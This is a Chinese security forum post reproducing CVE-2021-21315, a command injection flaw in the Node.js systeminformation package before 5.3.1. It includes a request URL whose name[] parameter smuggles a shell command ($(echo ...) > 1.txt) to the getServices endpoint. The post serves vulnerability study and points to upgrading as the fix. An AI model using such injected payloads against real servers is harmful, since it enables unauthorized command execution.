安全矩阵

 找回密码
 立即注册
搜索
查看: 1387|回复: 0

CVE-2021-21315 Linux sudoNode.js命令注入漏洞复现

[复制链接]

63

主题

125

帖子

457

积分

中级会员

Rank: 3Rank: 3

积分
457
发表于 2021-10-19 19:27:18 | 显示全部楼层 |阅读模式
CVE-2021-21315 Linux sudoNode.js命令注入漏洞复现漏洞简介 Node.js-systeminformation是用于获取各种系统信息的Node.JS模块,它包含多种轻量级功能,可以检索详细的硬件和系统相关信息。 2021年02月24日,npm团队发布安全公告,Node.js库中的systeminformation软件包中存在一个命令注入漏洞CVE-2021-21315,攻击者可以通过在未经过滤的参数中注入Payload来执行系统命令,最终获取服务器最高权限。
影响版本
Systeminformation < 5.3.1


漏洞复现
下载poc
nodejs开启http
node index.js
http://192.168.1.192:23854/api/getServices?name[]=$(echo%20-e%20%E2%80%98NULL%E2%80%99%20%3E%201.txt)


#
修复:
升级到安全版本

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-9-8 12:24 , Processed in 0.012242 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表